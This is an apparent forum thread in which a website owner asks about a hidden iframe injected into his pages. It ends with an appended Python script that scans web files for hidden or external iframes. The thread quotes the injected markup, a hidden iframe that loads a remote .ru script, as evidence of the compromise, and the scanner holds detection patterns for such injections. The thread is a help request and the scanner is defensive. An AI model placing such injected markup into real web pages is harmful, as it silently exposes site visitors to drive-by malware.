Old 07-29-2009, 04:26 AM hacked
Average Talker

Posts: 21
Trades: 0
I just removed code from a few pages that had a hidden iframe

<iframe src="http://example.ru:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden">
when this happens could it be an actual person who is hacking my site?


or could it be an actual person (like an enemy or someone who doesn't like me) who might cause this to happen


or is it just random code???

Last edited by BobMane; 07-29-2009 at 08:14 PM..
Old 07-29-2009, 05:45 AM Re: hacked
Super Talker

Posts: 128
Name: Jilesh
Trades: 0
Hi,

If you have installed a third-party tool on your domain, then upgrade it to the latest version and always stay upgraded.

Reset your password to a strong one and reset it at regular intervals.

If you have upgraded/downgraded or installed/uninstalled a third-party tool on your domain, then it may add this kind of code.
Old 07-29-2009, 12:25 PM Re: hacked
Average Talker

Posts: 21
Trades: 0
thanks, yes I have changed my password.

a couple questions

1. if i remove the code from all pages on server does it mean the Trojan is gone or does it still live on the server somehow?

2. if a Trojan or bad code like what I pasted above is in 1 page can it spread to other pages by itself or is it only FTP injected once?

3. if a Trojan or bad code like what I pasted above is pasted elsewhere (like in this forum post) can it become active where it is pasted?

4. When I was testing my site, I would go to the page I knew had the bad code in it and I would see 2" of white space at the top of my page. then, of course, when I looked at the code I saw the hidden iframe. Then I hit the refresh button on that page and I could see in the status bar the browser trying to connect or possibly connecting to the example.ru website. So the question is, if my computer was not infected and I hit the refresh button would that infect my computer?


finally, some of these questions arise because I don't know how far I have to go to "clean" everything. do I have to reinstall OS locally and wipe the server clean too?


It's a bit more complicated because I recently hired an Eastern European company to work on a new version of my site and I also suspect they might have somehow caused this (not intentionally....they have very high ratings on Elance anyway - FWIW). But they did access the server a couple times (and I always changed password after).

So how do I know it's not me or if it's them??? sorry about the confusion!

Last edited by BobMane; 07-29-2009 at 08:14 PM..
Old 07-30-2009, 11:17 AM Re: hacked
Average Talker

Posts: 21
Trades: 0
current is 1 and 1 hosting

the code that is redirecting (or attempting to redirect) is in the file source

at top of the body code:

</head>
<body>
<iframe src="http://example:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden"></iframe>
<div id="masthead">

the url http://example.rn is listed on MalwareURL.com as bad and it seemed to show in a few other Google results.



--


this is code in my web pages on my server


it has been seen elsewhere like by 1and 1 support and the developer. accessed from (mac or pc)


boot-time scan reveals nothing on my system (mac or pc) and windows updates normally.


it does try to redirect, it's a hidden iframe but the page loads (but the page header/graphics is shifted down by about 2")

then if you try to refresh the browser, you can see it attempting to load the bad/remote url (but it doesn't fully parse the page - it just keeps loading in the status bar)


--


UPDATE:

turns out the dev said that they did in fact have a virus on their server which somehow was transferred to my server. they said it has been cleaned.


if anyone is following this thread it would help to get some feedback because even though I now know the source, most of my questions have not been answered. given that now I'm kind of paranoid, I'd really like to know more about how these things work.

in addition to all the previous questions, how do I scan my server or a database if I want to??


is it possible to scan for keywords?
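Added example, not written by anyone in this thread: one way to do the kind of scan asked about in the last post, for files in a web root (it does not cover a database). It parses each page and reports every iframe that is styled as hidden or that loads from a host other than your own; `own_hosts`, `www.mysite.example` and the suffix list are assumptions, and the sample input is constructed from the snippet quoted above.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
WEB_SUFFIXES = {".html", ".htm", ".php", ".asp", ".aspx"}  # assumed page types

class IframeFinder(HTMLParser):
    """Collects (line, src, reasons) for every suspicious <iframe> start tag."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = own_hosts
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = urlparse(src).hostname  # None for relative URLs
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if host and host not in self.own_hosts:
            reasons.append("external-host")
        if reasons:
            self.findings.append((self.getpos()[0], src, reasons))

def scan_text(text, own_hosts=()):
    finder = IframeFinder(set(own_hosts))
    finder.feed(text)
    return finder.findings

def scan_tree(root, own_hosts=()):
    """Map each web file under root to its findings; clean files are omitted."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_SUFFIXES:
            found = scan_text(path.read_text(errors="replace"), own_hosts)
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample modelled on the markup quoted in the thread.
SAMPLE = ('</head>\n<body>\n'
          '<iframe src="http://example.ru:8080/ts/in.cgi?pepsi119" width=125 '
          'height=125 style="visibility: hidden"></iframe>\n<div id="masthead">\n')

if __name__ == "__main__":
    for line, src, reasons in scan_text(SAMPLE, {"www.mysite.example"}):
        print(f"line {line}: {src} ({', '.join(reasons)})")
```

Run `scan_tree` against a downloaded copy of the web root; it only sees iframes present as plain markup, so script-generated or obfuscated injections need a separate check.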
 